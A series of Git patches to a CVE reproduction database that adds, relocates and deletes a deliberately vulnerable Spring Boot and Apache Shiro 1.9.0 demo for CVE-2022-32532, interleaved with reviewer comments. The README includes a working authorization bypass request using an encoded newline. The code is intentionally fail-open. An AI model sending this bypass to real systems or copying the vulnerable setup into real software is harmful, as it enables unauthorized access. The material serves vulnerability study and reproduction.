From 83fa4a93100e423da4d1fa8d80aac37e081ec572 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:26:01 +0800
Subject: [PATCH 01/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ++
.../inspectionProfiles/profiles_settings.xml | 6 +++
.idea/misc.xml | 4 ++
.idea/modules.xml | 8 ++++
.idea/openkylin-exploit-db.iml | 12 ++++++
.idea/vcs.xml | 6 +++
.../2022/CVE-2022-32532/.gitignore | 33 +++++++++++++++
.../2022/CVE-2022-32532/README.md | 35 ++++++++++++++++
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ++++++++++++++++++
.../com/example/shirodemo/DemoController.java | 21 ++++++++++
.../java/com/example/shirodemo/MyFilter.java | 35 ++++++++++++++++
.../shirodemo/MyShiroFilterFactoryBean.java | 40 +++++++++++++++++++
.../com/example/shirodemo/ShiroConfig.java | 22 ++++++++++
.../shirodemo/ShiroDemoApplication.java | 13 ++++++
.../src/main/resources/application.properties | 0
.../2022/yaml/CVE-2022-32532.yaml | 23 +++++++++++
16 files changed, 299 insertions(+)
create mode 100644 .idea/.gitignore
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
create mode 100644 cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
diff --git a/.idea/.gitignore b/.idea/.gitignore
new file mode 100644
index 00000000..26d33521
--- /dev/null
+++ b/.idea/.gitignore
@@ -0,0 +1,3 @@
+# Default ignored files
+/shelf/
+/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..94a25f7f
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 00000000..975b0366
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 00000000..5210b547
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.7.0
+
+
+ com.example
+ shiro-demo
+ 0.0.1-SNAPSHOT
+ shiro-demo
+ CVE-2022-32532
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+ org.apache.shiro
+ shiro-spring
+ 1.9.0
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
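Review bot: The dependency block pins `shiro-spring` to `1.9.0`, which the advisory YAML added in this same patch lists as affected (Apache Shiro before 1.9.1), and nothing in the POM says the pin is intentional. Add an XML comment next to the version, e.g. `<!-- Intentionally pinned to an affected release: CVE-2022-32532 reproduction fixture -->`, so that dependency-scanner findings on this module are understood and the pin is neither bumped by accident nor copied into other modules. The element tags of this hunk are not visible in this view, so this note goes by the remaining values only.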
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 00000000..fd71b1a0
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
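Review bot: The second `permit()` overload at the bottom of the class has its `@RequestMapping(path = "/permit/*")` commented out, so Spring never routes to it and it is dead code whose only explanation is `// Another Bypass`. Either delete it or replace that comment with one that says what the alternative mapping is for, e.g. `// Alternative mapping for the same lab case; disabled so only /permit/{value} is routed.` The class performs no access check of its own and relies entirely on the Shiro filter chain, which deserves a one-line class comment such as `/** Lab endpoint: protected only by the Shiro chain registered in MyShiroFilterFactoryBean. */`. `System.out.println` could be replaced by a logger, and the unused `value` parameter either used or documented.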
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 00000000..beaf98ae
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
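Review bot: `onAccessDenied` writes "access denied" but never sets a status code, so a rejected request is presumably answered with the container's default 200 and cannot be told apart from a success in access logs or monitoring. Set the status before writing the body, e.g. `((HttpServletResponse) response).setStatus(HttpServletResponse.SC_FORBIDDEN);`, which needs `import javax.servlet.http.HttpServletResponse;`. In `isAccessAllowed` the literal `"4ra1n"` is a hard-coded shared value compared with `String.equals`; for a fixture that is acceptable, but `// todo: check permission ...` should say so, e.g. `// Lab-only static token; stands in for a real permission check.` The constructor's `new RegExPatternMatcher()` is the matcher the advisory in this patch concerns and deserves a comment naming CVE-2022-32532.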
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 00000000..d24431e4
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
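Review bot: The only chain registered in `createInstance()` is `manager.addToChain("/permit/.*", "myFilter")`, so any request path that `RegExPatternMatcher` does not match gets no filter at all and falls through to the controller; the configuration fails open. With `shiro-spring` 1.9.0 as pinned in this patch's pom.xml, that is the condition the accompanying advisory describes; outside a lab the remedy is Shiro 1.9.1 or later (or the default Ant-style matcher) together with a deny-by-default chain for unmatched paths. Please replace `// my filter` with a comment stating the intent, e.g. `// Regex-matched, fail-open chain kept on purpose to reproduce CVE-2022-32532.` Separately, `(WebSecurityManager) securityManager` is cast with no null or type check, so a missing or non-web manager surfaces as a ClassCastException or a later NullPointerException; `if (!(securityManager instanceof WebSecurityManager)) throw new IllegalStateException("WebSecurityManager required");` before the cast would make the failure explicit.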
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 00000000..30a0f1b5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
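Review bot: `securityManager()` returns a bare `new DefaultWebSecurityManager()` with no Realm set, so the only access decision in this application is the header check in MyFilter; as far as I know, any later `Subject.login` call would fail for lack of a configured realm. For the fixture that is fine, but it should be stated where the bean is defined, e.g. `// No Realm on purpose: access control in this demo is MyFilter's header check only.` The file also ends without a trailing newline.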
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 00000000..5d4615bd
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 00000000..e69de29b
diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
new file mode 100644
index 00000000..12fb0f1a
--- /dev/null
+++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-32532
+source: https://github.com/Lay0us1/CVE-2022-32532
+info:
+ name: Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。
+ severity: CRITICAL
+ description: |
+ 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
+ scope-of-influence:
+ Apache Shiro 1.9.1之前
+ reference:
+ - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32532
+ - https://www.cybersecurity-help.cz/vdb/SB2022062909
+ - https://cxsecurity.com/cveshow/CVE-2022-32532/
+ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-32532
+ cwe-id: CWE-863
+ cnvd-id: CNNVD-202206-2750
+ kve-id: None
+ tags: 旁路授权
\ No newline at end of file
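Review bot: The `cnvd-id` field holds `CNNVD-202206-2750`, which carries a CNNVD prefix rather than a CNVD one; these are different databases, so unless this repository's schema deliberately stores CNNVD numbers under that key, either rename the key or supply the CNVD identifier (placeholder: `CNVD-XXXX-XXXXX`) if one exists. `info.name` contains a description of the Shiro product rather than a name for this vulnerability, which makes the entry hard to tell apart from any other Shiro record. The last reference (vigilance.fr, Oracle Fusion Middleware October 2022) is a downstream vendor bulletin rather than a source about the Shiro flaw itself and could be dropped or labelled as such. The file also lacks a trailing newline.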
--
Gitee
From 57c4433f54e4d16ccab8fb86b62e7118ce716aab Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:26:37 +0800
Subject: [PATCH 02/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ---
.idea/inspectionProfiles/profiles_settings.xml | 6 ------
.idea/misc.xml | 4 ----
.idea/modules.xml | 8 --------
.idea/openkylin-exploit-db.iml | 12 ------------
.idea/vcs.xml | 6 ------
6 files changed, 39 deletions(-)
delete mode 100644 .idea/.gitignore
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
diff --git a/.idea/.gitignore b/.idea/.gitignore
deleted file mode 100644
index 26d33521..00000000
--- a/.idea/.gitignore
+++ /dev/null
@@ -1,3 +0,0 @@
-# Default ignored files
-/shelf/
-/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 94a25f7f..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
--
Gitee
From e3dd12526e32f36a274a3bc0e1d3e4440e9f15cf Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:40:28 +0800
Subject: [PATCH 03/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.gitmodules | 3 +++
CVE-2022-32532 | 1 +
2 files changed, 4 insertions(+)
create mode 160000 CVE-2022-32532
diff --git a/.gitmodules b/.gitmodules
index 389186c0..869d5aae 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -5,3 +5,6 @@
[submodule "cve/django/2022/CVE-2022-28346/POC_env"]
path = cve/django/2022/CVE-2022-28346/POC_env
url = https://github.com/DeEpinGh0st/CVE-2022-28346
+[submodule "CVE-2022-32532"]
+ path = CVE-2022-32532
+ url = https://github.com/Lay0us1/CVE-2022-32532
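Review bot: The new submodule's `url` points at a third-party GitHub account, so what this repository ships for the entry depends on that account; the gitlink added in the next file pins commit 58c03400ee5ad0fa4bd8b5d1908c750b6c42a34b, which protects integrity only for as long as that commit stays reachable upstream. Consider mirroring the repository under the project's own namespace and pointing `url` there, and document that consumers should run `git submodule update --init` without `--remote` so that the pinned commit is what gets checked out. `path = CVE-2022-32532` also places the submodule at the repository root while the same sources were added under cve/apache-Shiro/2022/CVE-2022-32532/ in patch 01 of this series, so two copies exist at this commit.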
diff --git a/CVE-2022-32532 b/CVE-2022-32532
new file mode 160000
index 00000000..58c03400
--- /dev/null
+++ b/CVE-2022-32532
@@ -0,0 +1 @@
+Subproject commit 58c03400ee5ad0fa4bd8b5d1908c750b6c42a34b
--
Gitee
From 82ef654006e9cd50b2da40328705dd6345a2b9e1 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:53:55 +0800
Subject: [PATCH 04/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.gitmodules | 4 +-
.../apache-Shiro/2022/CVE-2022-32532 | 0
.../2022/CVE-2022-32532/.gitignore | 33 ---------------
.../2022/CVE-2022-32532/README.md | 35 ----------------
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ------------------
.../com/example/shirodemo/DemoController.java | 21 ----------
.../java/com/example/shirodemo/MyFilter.java | 35 ----------------
.../shirodemo/MyShiroFilterFactoryBean.java | 40 -------------------
.../com/example/shirodemo/ShiroConfig.java | 22 ----------
.../shirodemo/ShiroDemoApplication.java | 13 ------
.../src/main/resources/application.properties | 0
11 files changed, 2 insertions(+), 239 deletions(-)
rename CVE-2022-32532 => cve/apache-Shiro/2022/CVE-2022-32532 (100%)
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
diff --git a/.gitmodules b/.gitmodules
index 869d5aae..6ee874ba 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -5,6 +5,6 @@
[submodule "cve/django/2022/CVE-2022-28346/POC_env"]
path = cve/django/2022/CVE-2022-28346/POC_env
url = https://github.com/DeEpinGh0st/CVE-2022-28346
-[submodule "CVE-2022-32532"]
- path = CVE-2022-32532
+[submodule "cve/apache-Shiro/2022/CVE-2022-32532"]
+ path = cve/apache-Shiro/2022/CVE-2022-32532
url = https://github.com/Lay0us1/CVE-2022-32532
diff --git a/CVE-2022-32532 b/cve/apache-Shiro/2022/CVE-2022-32532
similarity index 100%
rename from CVE-2022-32532
rename to cve/apache-Shiro/2022/CVE-2022-32532
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
deleted file mode 100644
index 549e00a2..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
+++ /dev/null
@@ -1,33 +0,0 @@
-HELP.md
-target/
-!.mvn/wrapper/maven-wrapper.jar
-!**/src/main/**/target/
-!**/src/test/**/target/
-
-### STS ###
-.apt_generated
-.classpath
-.factorypath
-.project
-.settings
-.springBeans
-.sts4-cache
-
-### IntelliJ IDEA ###
-.idea
-*.iws
-*.iml
-*.ipr
-
-### NetBeans ###
-/nbproject/private/
-/nbbuild/
-/dist/
-/nbdist/
-/.nb-gradle/
-build/
-!**/src/main/**/build/
-!**/src/test/**/build/
-
-### VS Code ###
-.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
deleted file mode 100644
index 975b0366..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/README.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# CVE-2022-32532
-
-## about
-
-This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
-
-In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
-
-## introduce
-
-Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
-
-This request can succeed
-```http request
-GET /permit/any HTTP/1.1
-Token: 4ra1n
-```
-
-Access is not allowed when there is no token request header
-```http request
-GET /permit/any HTTP/1.1
-```
-
-It can be bypassed in a simple way in special but common configurations
-```http request
-GET /permit/a%0any HTTP/1.1
-```
-
-## reference
-
-https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
-
-This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
-
-Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
deleted file mode 100644
index 5210b547..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
+++ /dev/null
@@ -1,38 +0,0 @@
-
-
- 4.0.0
-
- org.springframework.boot
- spring-boot-starter-parent
- 2.7.0
-
-
- com.example
- shiro-demo
- 0.0.1-SNAPSHOT
- shiro-demo
- CVE-2022-32532
-
- 1.8
-
-
-
- org.springframework.boot
- spring-boot-starter-web
-
-
- org.apache.shiro
- shiro-spring
- 1.9.0
-
-
-
-
-
- org.springframework.boot
- spring-boot-maven-plugin
-
-
-
-
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
deleted file mode 100644
index fd71b1a0..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
+++ /dev/null
@@ -1,21 +0,0 @@
-package com.example.shirodemo;
-
-import org.springframework.web.bind.annotation.PathVariable;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RestController;
-
-@RestController
-public class DemoController {
- @RequestMapping(path = "/permit/{value}")
- public String permit(@PathVariable String value) {
- System.out.println("success!");
- return "success";
- }
-
- // Another Bypass
- // @RequestMapping(path = "/permit/*")
- public String permit() {
- System.out.println("success!");
- return "success";
- }
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
deleted file mode 100644
index beaf98ae..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
+++ /dev/null
@@ -1,35 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.util.RegExPatternMatcher;
-import org.apache.shiro.web.filter.AccessControlFilter;
-
-import javax.servlet.ServletRequest;
-import javax.servlet.ServletResponse;
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-
-public class MyFilter extends AccessControlFilter {
-
- public MyFilter(){
- super();
- this.pathMatcher = new RegExPatternMatcher();
- }
-
- @Override
- protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
- String token = ((HttpServletRequest)request).getHeader("Token");
- // todo: check permission ...
- return token != null && token.equals("4ra1n");
- }
-
- @Override
- protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
- System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
- try {
- response.getWriter().println("access denied");
- } catch (IOException e) {
- e.printStackTrace();
- }
- return false;
- }
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
deleted file mode 100644
index d24431e4..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
+++ /dev/null
@@ -1,40 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.util.RegExPatternMatcher;
-import org.apache.shiro.web.filter.mgt.*;
-import org.apache.shiro.web.mgt.WebSecurityManager;
-import org.apache.shiro.web.servlet.AbstractShiroFilter;
-
-
-public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
-
